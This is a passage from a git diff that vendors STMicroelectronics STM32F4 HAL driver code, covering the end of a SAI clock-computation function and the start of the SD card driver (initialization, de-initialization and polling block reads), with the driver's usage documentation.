assert_param(IS_SAI_CLK_SOURCE(hsai->Init.ClockSource)); + + /* SAI Block clock source selection */ + if (hsai->Instance == SAI1_Block_A) + { + __HAL_RCC_SAI_BLOCKACLKSOURCE_CONFIG(hsai->Init.ClockSource); + } + else + { + __HAL_RCC_SAI_BLOCKBCLKSOURCE_CONFIG((uint32_t)(hsai->Init.ClockSource << 2U)); + } + + /* VCO Input Clock value calculation */ + if ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSI) + { + /* In Case the PLL Source is HSI (Internal Clock) */ + vcoinput = (HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* In Case the PLL Source is HSE (External Clock) */ + vcoinput = ((HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM))); + } +#if defined(STM32F413xx) || defined(STM32F423xx) + /* SAI_CLK_x : SAI Block Clock configuration for different clock sources selected */ + if (hsai->Init.ClockSource == SAI_CLKSOURCE_PLLR) + { + /* Configure the PLLI2S division factor */ + /* PLL_VCO Input = PLL_SOURCE/PLLM */ + /* PLL_VCO Output = PLL_VCO Input * PLLN */ + /* SAI_CLK(first level) = PLL_VCO Output/PLLR */ + tmpreg = (RCC->PLLCFGR & RCC_PLLCFGR_PLLR) >> 28U; + saiclocksource = (vcoinput * ((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> 6U)) / (tmpreg); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLDIVR */ + tmpreg = (((RCC->DCKCFGR & RCC_DCKCFGR_PLLDIVR) >> 8U) + 1U); + + saiclocksource = saiclocksource / (tmpreg); + + } + else if (hsai->Init.ClockSource == SAI_CLKSOURCE_PLLI2S) + { + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLM */ + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + /* SAI_CLK(first level) = PLLI2S_VCO Output/PLLI2SR */ + tmpreg = (RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> 28U; + saiclocksource = (vcoinput * ((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U)) / (tmpreg); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLI2SDIVR */ + tmpreg = ((RCC->DCKCFGR & RCC_DCKCFGR_PLLI2SDIVR) + 1U); + saiclocksource = saiclocksource / (tmpreg); + } + else if (hsai->Init.ClockSource == SAI_CLKSOURCE_HS) + { + if ((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + saiclocksource = (uint32_t)(HSE_VALUE); + } + else + { + /* Get the I2S source clock value */ + saiclocksource = (uint32_t)(HSI_VALUE); + } + } + else /* sConfig->ClockSource == SAI_CLKSource_Ext */ + { + saiclocksource = EXTERNAL_CLOCK_VALUE; + } +#else + /* SAI_CLK_x : SAI Block Clock configuration for different clock sources selected */ + if (hsai->Init.ClockSource == SAI_CLKSOURCE_PLLSAI) + { + /* Configure the PLLI2S division factor */ + /* PLLSAI_VCO Input = PLL_SOURCE/PLLM */ + /* PLLSAI_VCO Output = PLLSAI_VCO Input * PLLSAIN */ + /* SAI_CLK(first level) = PLLSAI_VCO Output/PLLSAIQ */ + tmpreg = (RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIQ) >> 24U; + saiclocksource = (vcoinput * ((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIN) >> 6U)) / (tmpreg); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLSAIDIVQ */ + tmpreg = (((RCC->DCKCFGR & RCC_DCKCFGR_PLLSAIDIVQ) >> 8U) + 1U); + saiclocksource = saiclocksource / (tmpreg); + + } + else if (hsai->Init.ClockSource == SAI_CLKSOURCE_PLLI2S) + { + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLM */ + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + /* SAI_CLK(first level) = PLLI2S_VCO Output/PLLI2SQ */ + tmpreg = (RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SQ) >> 24U; + saiclocksource = (vcoinput * ((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U)) / (tmpreg); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLI2SDIVQ */ + tmpreg = ((RCC->DCKCFGR & RCC_DCKCFGR_PLLI2SDIVQ) + 1U); + saiclocksource = saiclocksource / (tmpreg); + } + else /* sConfig->ClockSource == SAI_CLKSource_Ext */ + { + /* Enable the External Clock selection */ + __HAL_RCC_I2S_CONFIG(RCC_I2SCLKSOURCE_EXT); + + saiclocksource = EXTERNAL_CLOCK_VALUE; + } +#endif /* STM32F413xx || STM32F423xx */ +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F469xx || STM32F479xx || STM32F413xx || STM32F423xx */ + /* the return result is the value of SAI clock */ + return saiclocksource; +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F446xx || STM32F469xx || STM32F479xx || STM32F413xx || STM32F423xx */ +#endif /* HAL_SAI_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sd.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sd.c new file mode 100644 index 000000000..0c7b13bc9 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sd.c @@ -0,0 +1,3276 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_sd.c + * @author MCD Application Team + * @brief SD card HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Secure Digital (SD) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + This driver implements a high level communication layer for read and write from/to + this memory. The needed STM32 hardware resources (SDIO and GPIO) are performed by + the user in HAL_SD_MspInit() function (MSP layer). + Basically, the MSP layer configuration should be the same as we provide in the + examples. + You can easily tailor this configuration according to hardware resources. + + [..] + This driver is a generic layered driver for SDIO memories which uses the HAL + SDIO driver functions to interface with SD and uSD cards devices. + It is used as follows: + + (#)Initialize the SDIO low level resources by implementing the HAL_SD_MspInit() API: + (##) Enable the SDIO interface clock using __HAL_RCC_SDIO_CLK_ENABLE(); + (##) SDIO pins configuration for SD card + (+++) Enable the clock for the SDIO GPIOs using the functions __HAL_RCC_GPIOx_CLK_ENABLE(); + (+++) Configure these SDIO pins as alternate function pull-up using HAL_GPIO_Init() + and according to your pin assignment; + (##) DMA configuration if you need to use DMA process (HAL_SD_ReadBlocks_DMA() + and HAL_SD_WriteBlocks_DMA() APIs). + (+++) Enable the DMAx interface clock using __HAL_RCC_DMAx_CLK_ENABLE(); + (+++) Configure the DMA using the function HAL_DMA_Init() with predeclared and filled. + (##) NVIC configuration if you need to use interrupt process when using DMA transfer. + (+++) Configure the SDIO and DMA interrupt priorities using functions + HAL_NVIC_SetPriority(); DMA priority is superior to SDIO's priority + (+++) Enable the NVIC DMA and SDIO IRQs using function HAL_NVIC_EnableIRQ() + (+++) SDIO interrupts are managed using the macros __HAL_SD_ENABLE_IT() + and __HAL_SD_DISABLE_IT() inside the communication process. + (+++) SDIO interrupts pending bits are managed using the macros __HAL_SD_GET_IT() + and __HAL_SD_CLEAR_IT() + (##) NVIC configuration if you need to use interrupt process (HAL_SD_ReadBlocks_IT() + and HAL_SD_WriteBlocks_IT() APIs). + (+++) Configure the SDIO interrupt priorities using function HAL_NVIC_SetPriority(); + (+++) Enable the NVIC SDIO IRQs using function HAL_NVIC_EnableIRQ() + (+++) SDIO interrupts are managed using the macros __HAL_SD_ENABLE_IT() + and __HAL_SD_DISABLE_IT() inside the communication process. + (+++) SDIO interrupts pending bits are managed using the macros __HAL_SD_GET_IT() + and __HAL_SD_CLEAR_IT() + (#) At this stage, you can perform SD read/write/erase operations after SD card initialization + + + *** SD Card Initialization and configuration *** + ================================================ + [..] + To initialize the SD Card, use the HAL_SD_Init() function. It Initializes + SDIO Peripheral(STM32 side) and the SD Card, and put it into StandBy State (Ready for data transfer). + This function provide the following operations: + + (#) Apply the SD Card initialization process at 400KHz and check the SD Card + type (Standard Capacity or High Capacity). You can change or adapt this + frequency by adjusting the "ClockDiv" field. + The SD Card frequency (SDIO_CK) is computed as follows: + + SDIO_CK = SDIOCLK / (ClockDiv + 2) + + In initialization mode and according to the SD Card standard, + make sure that the SDIO_CK frequency doesn't exceed 400KHz. + + This phase of initialization is done through SDIO_Init() and + SDIO_PowerState_ON() SDIO low level APIs. + + (#) Initialize the SD card. The API used is HAL_SD_InitCard(). + This phase allows the card initialization and identification + and check the SD Card type (Standard Capacity or High Capacity) + The initialization flow is compatible with SD standard. + + This API (HAL_SD_InitCard()) could be used also to reinitialize the card in case + of plug-off plug-in. + + (#) Configure the SD Card Data transfer frequency. You can change or adapt this + frequency by adjusting the "ClockDiv" field. + In transfer mode and according to the SD Card standard, make sure that the + SDIO_CK frequency doesn't exceed 25MHz and 50MHz in High-speed mode switch. + To be able to use a frequency higher than 24MHz, you should use the SDIO + peripheral in bypass mode. Refer to the corresponding reference manual + for more details. + + (#) Select the corresponding SD Card according to the address read with the step 2. + + (#) Configure the SD Card in wide bus mode: 4-bits data. + + *** SD Card Read operation *** + ============================== + [..] + (+) You can read from SD card in polling mode by using function HAL_SD_ReadBlocks(). + This function support only 512-bytes block length (the block size should be + chosen as 512 bytes). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_SD_GetCardState() function for SD card state. + + (+) You can read from SD card in DMA mode by using function HAL_SD_ReadBlocks_DMA(). + This function support only 512-bytes block length (the block size should be + chosen as 512 bytes). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_SD_GetCardState() function for SD card state. + You could also check the DMA transfer process through the SD Rx interrupt event. + + (+) You can read from SD card in Interrupt mode by using function HAL_SD_ReadBlocks_IT(). + This function support only 512-bytes block length (the block size should be + chosen as 512 bytes). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_SD_GetCardState() function for SD card state. + You could also check the IT transfer process through the SD Rx interrupt event. + + *** SD Card Write operation *** + =============================== + [..] + (+) You can write to SD card in polling mode by using function HAL_SD_WriteBlocks(). + This function support only 512-bytes block length (the block size should be + chosen as 512 bytes). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_SD_GetCardState() function for SD card state. + + (+) You can write to SD card in DMA mode by using function HAL_SD_WriteBlocks_DMA(). + This function support only 512-bytes block length (the block size should be + chosen as 512 bytes). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_SD_GetCardState() function for SD card state. + You could also check the DMA transfer process through the SD Tx interrupt event. + + (+) You can write to SD card in Interrupt mode by using function HAL_SD_WriteBlocks_IT(). + This function support only 512-bytes block length (the block size should be + chosen as 512 bytes). + You can choose either one block read operation or multiple block read operation + by adjusting the "NumberOfBlocks" parameter. + After this, you have to ensure that the transfer is done correctly. The check is done + through HAL_SD_GetCardState() function for SD card state. + You could also check the IT transfer process through the SD Tx interrupt event. + + *** SD card status *** + ====================== + [..] + (+) The SD Status contains status bits that are related to the SD Memory + Card proprietary features. To get SD card status use the HAL_SD_GetCardStatus(). + + *** SD card information *** + =========================== + [..] + (+) To get SD card information, you can use the function HAL_SD_GetCardInfo(). + It returns useful information about the SD card such as block size, card type, + block number ... + + *** SD card CSD register *** + ============================ + (+) The HAL_SD_GetCardCSD() API allows to get the parameters of the CSD register. + Some of the CSD parameters are useful for card initialization and identification. + + *** SD card CID register *** + ============================ + (+) The HAL_SD_GetCardCID() API allows to get the parameters of the CID register. + Some of the CSD parameters are useful for card initialization and identification. + + *** SD HAL driver macros list *** + ================================== + [..] + Below the list of most used macros in SD HAL driver. + + (+) __HAL_SD_ENABLE : Enable the SD device + (+) __HAL_SD_DISABLE : Disable the SD device + (+) __HAL_SD_DMA_ENABLE: Enable the SDIO DMA transfer + (+) __HAL_SD_DMA_DISABLE: Disable the SDIO DMA transfer + (+) __HAL_SD_ENABLE_IT: Enable the SD device interrupt + (+) __HAL_SD_DISABLE_IT: Disable the SD device interrupt + (+) __HAL_SD_GET_FLAG:Check whether the specified SD flag is set or not + (+) __HAL_SD_CLEAR_FLAG: Clear the SD's pending flags + + (@) You can refer to the SD HAL driver header file for more useful macros + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_SD_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + Use Functions HAL_SD_RegisterCallback() to register a user callback, + it allows to register following callbacks: + (+) TxCpltCallback : callback when a transmission transfer is completed. + (+) RxCpltCallback : callback when a reception transfer is completed. + (+) ErrorCallback : callback when error occurs. + (+) AbortCpltCallback : callback when abort is completed. + (+) MspInitCallback : SD MspInit. + (+) MspDeInitCallback : SD MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function HAL_SD_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. It allows to reset following callbacks: + (+) TxCpltCallback : callback when a transmission transfer is completed. + (+) RxCpltCallback : callback when a reception transfer is completed. + (+) ErrorCallback : callback when error occurs. + (+) AbortCpltCallback : callback when abort is completed. + (+) MspInitCallback : SD MspInit. + (+) MspDeInitCallback : SD MspDeInit. + This function) takes as parameters the HAL peripheral handle and the Callback ID. + + By default, after the HAL_SD_Init and if the state is HAL_SD_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions. + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the HAL_SD_Init + and HAL_SD_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_SD_Init and HAL_SD_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_SD_RegisterCallback before calling HAL_SD_DeInit + or HAL_SD_Init function. + + When The compilation define USE_HAL_SD_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +#if defined(SDIO) + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @addtogroup SD + * @{ + */ + +#ifdef HAL_SD_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup SD_Private_Defines + * @{ + */ + +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @defgroup SD_Private_Functions SD Private Functions + * @{ + */ +static uint32_t SD_InitCard(SD_HandleTypeDef *hsd); +static uint32_t SD_PowerON(SD_HandleTypeDef *hsd); +static uint32_t SD_SendSDStatus(SD_HandleTypeDef *hsd, uint32_t *pSDstatus); +static uint32_t SD_SendStatus(SD_HandleTypeDef *hsd, uint32_t *pCardStatus); +static uint32_t SD_WideBus_Enable(SD_HandleTypeDef *hsd); +static uint32_t SD_WideBus_Disable(SD_HandleTypeDef *hsd); +static uint32_t SD_FindSCR(SD_HandleTypeDef *hsd, uint32_t *pSCR); +static void SD_PowerOFF(SD_HandleTypeDef *hsd); +static void SD_Write_IT(SD_HandleTypeDef *hsd); +static void SD_Read_IT(SD_HandleTypeDef *hsd); +static void SD_DMATransmitCplt(DMA_HandleTypeDef *hdma); +static void SD_DMAReceiveCplt(DMA_HandleTypeDef *hdma); +static void SD_DMAError(DMA_HandleTypeDef *hdma); +static void SD_DMATxAbort(DMA_HandleTypeDef *hdma); +static void SD_DMARxAbort(DMA_HandleTypeDef *hdma); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup SD_Exported_Functions + * @{ + */ + +/** @addtogroup SD_Exported_Functions_Group1 + * @brief Initialization and de-initialization functions + * +@verbatim + ============================================================================== + ##### Initialization and de-initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to initialize/de-initialize the SD + card device to be ready for use. + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the SD according to the specified parameters in the + SD_HandleTypeDef and create the associated handle. + * @param hsd: Pointer to the SD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_Init(SD_HandleTypeDef *hsd) +{ + /* Check the SD handle allocation */ + if(hsd == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SDIO_ALL_INSTANCE(hsd->Instance)); + assert_param(IS_SDIO_CLOCK_EDGE(hsd->Init.ClockEdge)); + assert_param(IS_SDIO_CLOCK_BYPASS(hsd->Init.ClockBypass)); + assert_param(IS_SDIO_CLOCK_POWER_SAVE(hsd->Init.ClockPowerSave)); + assert_param(IS_SDIO_BUS_WIDE(hsd->Init.BusWide)); + assert_param(IS_SDIO_HARDWARE_FLOW_CONTROL(hsd->Init.HardwareFlowControl)); + assert_param(IS_SDIO_CLKDIV(hsd->Init.ClockDiv)); + + if(hsd->State == HAL_SD_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hsd->Lock = HAL_UNLOCKED; +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + /* Reset Callback pointers in HAL_SD_STATE_RESET only */ + hsd->TxCpltCallback = HAL_SD_TxCpltCallback; + hsd->RxCpltCallback = HAL_SD_RxCpltCallback; + hsd->ErrorCallback = HAL_SD_ErrorCallback; + hsd->AbortCpltCallback = HAL_SD_AbortCallback; + + if(hsd->MspInitCallback == NULL) + { + hsd->MspInitCallback = HAL_SD_MspInit; + } + + /* Init the low level hardware */ + hsd->MspInitCallback(hsd); +#else + /* Init the low level hardware : GPIO, CLOCK, CORTEX...etc */ + HAL_SD_MspInit(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + } + + hsd->State = HAL_SD_STATE_BUSY; + + /* Initialize the Card parameters */ + if (HAL_SD_InitCard(hsd) != HAL_OK) + { + return HAL_ERROR; + } + + /* Initialize the error code */ + hsd->ErrorCode = HAL_SD_ERROR_NONE; + + /* Initialize the SD operation */ + hsd->Context = SD_CONTEXT_NONE; + + /* Initialize the SD state */ + hsd->State = HAL_SD_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Initializes the SD Card. + * @param hsd: Pointer to SD handle + * @note This function initializes the SD card. It could be used when a card + re-initialization is needed. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_InitCard(SD_HandleTypeDef *hsd) +{ + uint32_t errorstate; + HAL_StatusTypeDef status; + SD_InitTypeDef Init; + + /* Default SDIO peripheral configuration for SD card initialization */ + Init.ClockEdge = SDIO_CLOCK_EDGE_RISING; + Init.ClockBypass = SDIO_CLOCK_BYPASS_DISABLE; + Init.ClockPowerSave = SDIO_CLOCK_POWER_SAVE_DISABLE; + Init.BusWide = SDIO_BUS_WIDE_1B; + Init.HardwareFlowControl = SDIO_HARDWARE_FLOW_CONTROL_DISABLE; + Init.ClockDiv = SDIO_INIT_CLK_DIV; + + /* Initialize SDIO peripheral interface with default configuration */ + status = SDIO_Init(hsd->Instance, Init); + if(status != HAL_OK) + { + return HAL_ERROR; + } + + /* Disable SDIO Clock */ + __HAL_SD_DISABLE(hsd); + + /* Set Power State to ON */ + (void)SDIO_PowerState_ON(hsd->Instance); + + /* Enable SDIO Clock */ + __HAL_SD_ENABLE(hsd); + + /* Identify card operating voltage */ + errorstate = SD_PowerON(hsd); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->State = HAL_SD_STATE_READY; + hsd->ErrorCode |= errorstate; + return HAL_ERROR; + } + + /* Card initialization */ + errorstate = SD_InitCard(hsd); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->State = HAL_SD_STATE_READY; + hsd->ErrorCode |= errorstate; + return HAL_ERROR; + } + + /* Set Block Size for Card */ + errorstate = SDMMC_CmdBlockLength(hsd->Instance, BLOCKSIZE); + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief De-Initializes the SD card. + * @param hsd: Pointer to SD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_DeInit(SD_HandleTypeDef *hsd) +{ + /* Check the SD handle allocation */ + if(hsd == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SDIO_ALL_INSTANCE(hsd->Instance)); + + hsd->State = HAL_SD_STATE_BUSY; + + /* Set SD power state to off */ + SD_PowerOFF(hsd); + +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + if(hsd->MspDeInitCallback == NULL) + { + hsd->MspDeInitCallback = HAL_SD_MspDeInit; + } + + /* DeInit the low level hardware */ + hsd->MspDeInitCallback(hsd); +#else + /* De-Initialize the MSP layer */ + HAL_SD_MspDeInit(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + + hsd->ErrorCode = HAL_SD_ERROR_NONE; + hsd->State = HAL_SD_STATE_RESET; + + return HAL_OK; +} + + +/** + * @brief Initializes the SD MSP. + * @param hsd: Pointer to SD handle + * @retval None + */ +__weak void HAL_SD_MspInit(SD_HandleTypeDef *hsd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SD_MspInit could be implemented in the user file + */ +} + +/** + * @brief De-Initialize SD MSP. + * @param hsd: Pointer to SD handle + * @retval None + */ +__weak void HAL_SD_MspDeInit(SD_HandleTypeDef *hsd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hsd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_SD_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @addtogroup SD_Exported_Functions_Group2 + * @brief Data transfer functions + * +@verbatim + ============================================================================== + ##### IO operation functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to manage the data + transfer from/to SD card. + +@endverbatim + * @{ + */ + +/** + * @brief Reads block(s) from a specified address in a card. The Data transfer + * is managed by polling mode. + * @note This API should be followed by a check on the card state through + * HAL_SD_GetCardState(). + * @param hsd: Pointer to SD handle + * @param pData: pointer to the buffer that will contain the received data + * @param BlockAdd: Block Address from where data is to be read + * @param NumberOfBlocks: Number of SD blocks to read + * @param Timeout: Specify timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_ReadBlocks(SD_HandleTypeDef *hsd, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks, uint32_t Timeout) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t tickstart = HAL_GetTick(); + uint32_t count, data, dataremaining; + uint32_t add = BlockAdd; + uint8_t *tempbuff = pData; + + if(NULL == pData) + { + hsd->ErrorCode |= HAL_SD_ERROR_PARAM; + return HAL_ERROR; + } + + if(hsd->State == HAL_SD_STATE_READY) + { + hsd->ErrorCode = HAL_SD_ERROR_NONE; + + if((add + NumberOfBlocks) > (hsd->SdCard.LogBlockNbr)) + { + hsd->ErrorCode |= HAL_SD_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hsd->State = HAL_SD_STATE_BUSY; + + /* Initialize data control register */ + hsd->Instance->DCTRL = 0U; + + if(hsd->SdCard.CardType != CARD_SDHC_SDXC) + { + add *= 512U; + } + + /* Configure the SD DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = NumberOfBlocks * BLOCKSIZE; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_SDIO; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hsd->Instance, &config); + + /* Read block(s) in polling mode */ + if(NumberOfBlocks > 1U) + { + hsd->Context = SD_CONTEXT_READ_MULTIPLE_BLOCK; + + /* Read Multi Block command */ + errorstate = SDMMC_CmdReadMultiBlock(hsd->Instance, add); + } + else + { + hsd->Context = SD_CONTEXT_READ_SINGLE_BLOCK; + + /* Read Single Block command */ + errorstate = SDMMC_CmdReadSingleBlock(hsd->Instance, add); + } + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + + /* Poll on SDIO flags */ + dataremaining = config.DataLength; +#if defined(SDIO_STA_STBITERR) + while(!__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXOVERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DATAEND | SDIO_FLAG_STBITERR)) +#else /* SDIO_STA_STBITERR not defined */ + while(!__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXOVERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DATAEND)) +#endif /* SDIO_STA_STBITERR */ + { + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXFIFOHF) && (dataremaining > 0U)) + { + /* Read data from SDIO Rx FIFO */ + for(count = 0U; count < 8U; count++) + { + data = SDIO_ReadFIFO(hsd->Instance); + *tempbuff = (uint8_t)(data & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 8U) & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 16U) & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 24U) & 0xFFU); + tempbuff++; + dataremaining--; + } + } + + if(((HAL_GetTick()-tickstart) >= Timeout) || (Timeout == 0U)) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_TIMEOUT; + hsd->State= HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_TIMEOUT; + } + } + + /* Send stop transmission command in case of multiblock read */ + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DATAEND) && (NumberOfBlocks > 1U)) + { + if(hsd->SdCard.CardType != CARD_SECURED) + { + /* Send stop transmission command */ + errorstate = SDMMC_CmdStopTransfer(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + } + } + + /* Get error state */ + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DTIMEOUT)) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_DATA_TIMEOUT; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DCRCFAIL)) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_DATA_CRC_FAIL; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXOVERR)) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_RX_OVERRUN; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + else + { + /* Nothing to do */ + } + + /* Empty FIFO if there is still any data */ + while ((__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXDAVL)) && (dataremaining > 0U)) + { + data = SDIO_ReadFIFO(hsd->Instance); + *tempbuff = (uint8_t)(data & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 8U) & 0xFFU); + tempbuff++; + 